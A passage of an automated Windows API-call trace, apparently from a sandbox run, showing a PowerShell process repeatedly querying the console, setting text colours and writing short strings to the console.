lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffcfac*, lpNumberOfCharsWritten=0x653ef8b500*=0x13) returned 1 [0275.856] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.856] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.856] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.857] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.857] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.859] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0275.859] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.859] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.860] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.861] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.861] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.862] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.862] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.862] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffcfec*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffcfec*, lpNumberOfCharsWritten=0x653ef8b500*=0x4f) returned 1 [0275.863] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.864] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.864] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.864] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.865] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.865] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0275.866] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.866] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.867] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.867] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.867] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.868] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.868] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.869] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.869] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffd0a4*, nNumberOfCharsToWrite=0x43, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffd0a4*, lpNumberOfCharsWritten=0x653ef8b500*=0x43) returned 1 [0275.870] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.871] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.871] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.872] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.872] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.872] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0275.873] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.873] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.874] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.874] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.874] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.875] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.875] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.876] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.876] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffd144*, nNumberOfCharsToWrite=0x48, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffd144*, lpNumberOfCharsWritten=0x653ef8b500*=0x48) returned 1 [0275.877] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.877] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.878] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.878] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.879] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.879] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0275.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.880] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.881] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.881] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.882] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.882] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.883] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.883] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffd1f4*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffd1f4*, lpNumberOfCharsWritten=0x653ef8b500*=0x27) returned 1 [0275.884] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.884] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.884] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.885] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.885] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.886] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0275.886] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0275.887] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.887] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.887] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.888] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0275.888] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0275.889] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0275.889] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0275.889] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5bffd25c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5bffd25c*, lpNumberOfCharsWritten=0x653ef8b500*=0x1) returned 1 [0275.890] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.890] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0275.891] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0275.891] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0275.892] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0275.892] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.349] EtwEventActivityIdControl () returned 0x0 [0276.349] EtwEventActivityIdControl () returned 0x0 [0276.349] EtwEventActivityIdControl () returned 0x0 [0276.349] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89ee0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.350] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x6ec [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.350] EtwEventActivityIdControl () returned 0x0 [0276.351] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89200, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.351] EtwEventActivityIdControl () returned 0x0 [0276.352] EtwEventActivityIdControl () returned 0x0 [0276.352] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8aa98 | out: lpConsoleScreenBufferInfo=0x653ef8aa98) returned 1 [0276.353] EtwEventActivityIdControl () returned 0x0 [0276.353] EtwEventActivityIdControl () returned 0x0 [0276.353] EtwEventActivityIdControl () returned 0x0 [0276.353] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89ee0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0276.353] EtwEventActivityIdControl () returned 0x0 [0276.353] EtwEventActivityIdControl () returned 0x0 [0276.353] EtwEventActivityIdControl () returned 0x0 [0276.354] EtwEventActivityIdControl () returned 0x0 [0276.354] EtwEventActivityIdControl () returned 0x0 [0276.354] EtwEventActivityIdControl () returned 0x0 [0276.355] EtwEventActivityIdControl () returned 0x0 [0276.355] EtwEventActivityIdControl () returned 0x0 [0276.355] EtwEventActivityIdControl () returned 0x0 [0276.355] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x653ef89ee0, nSize=0xe4 | out: lpBuffer="") returned 0x0 [0276.356] EtwEventActivityIdControl () returned 0x0 [0276.356] EtwEventActivityIdControl () returned 0x0 [0276.356] EtwEventActivityIdControl () returned 0x0 [0276.356] EtwEventActivityIdControl () returned 0x0 [0276.356] EtwEventActivityIdControl () returned 0x0 [0276.356] EtwEventActivityIdControl () returned 0x0 [0276.364] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b608 | out: lpConsoleScreenBufferInfo=0x653ef8b608) returned 1 [0276.364] GetConsoleOutputCP () returned 0x1b5 [0276.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.365] GetConsoleOutputCP () returned 0x1b5 [0276.365] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.365] GetConsoleOutputCP () returned 0x1b5 [0276.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.366] GetConsoleOutputCP () returned 0x1b5 [0276.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.366] GetConsoleOutputCP () returned 0x1b5 [0276.366] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.366] GetConsoleOutputCP () returned 0x1b5 [0276.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.367] GetConsoleOutputCP () returned 0x1b5 [0276.367] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x653ef8b4b8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x653ef8b4b8) returned 0 [0276.367] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.368] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.369] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.369] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.370] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.370] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.371] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f114*, nNumberOfCharsToWrite=0x1f, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f114*, lpNumberOfCharsWritten=0x653ef8b500*=0x1f) returned 1 [0276.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.372] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.372] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.373] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.373] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.373] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.374] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.375] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.375] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.376] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.376] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.377] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.377] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f16c*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f16c*, lpNumberOfCharsWritten=0x653ef8b500*=0x13) returned 1 [0276.378] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.378] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.379] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.379] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.379] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.380] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.380] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.381] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.382] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.382] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.383] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.383] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.384] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f1ac*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f1ac*, lpNumberOfCharsWritten=0x653ef8b500*=0x4f) returned 1 [0276.384] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.385] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.385] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.386] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.386] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.386] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.387] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.388] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.388] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x5c) returned 1 [0276.389] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b4e8 | out: lpConsoleScreenBufferInfo=0x653ef8b4e8) returned 1 [0276.389] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0xc) returned 1 [0276.390] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b510 | out: lpMode=0x653ef8b510) returned 1 [0276.390] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5c03f264*, nNumberOfCharsToWrite=0x43, lpNumberOfCharsWritten=0x653ef8b500, lpReserved=0x0 | out: lpBuffer=0x25b5c03f264*, lpNumberOfCharsWritten=0x653ef8b500*=0x43) returned 1 [0276.391] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.391] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x6) returned 1 [0276.392] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b498 | out: lpConsoleScreenBufferInfo=0x653ef8b498) returned 1 [0276.392] SetConsoleTextAttribute (hConsoleOutput=0x454, wAttributes=0x56) returned 1 [0276.392] GetConsoleMode (in: hConsoleHandle=0x454, lpMode=0x653ef8b5b0 | out: lpMode=0x653ef8b5b0) returned 1 [0276.393] WriteConsoleW (in: hConsoleOutput=0x454, lpBuffer=0x25b5b937b7c*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x653ef8b5a0, lpReserved=0x0 | out: lpBuffer=0x25b5b937b7c*, lpNumberOfCharsWritten=0x653ef8b5a0*=0x1) returned 1 [0276.393] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, lpConsoleScreenBufferInfo=0x653ef8b538 | out: lpConsoleScreenBufferInfo=0x653ef8b538) returned 1 [0276.394] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x454, 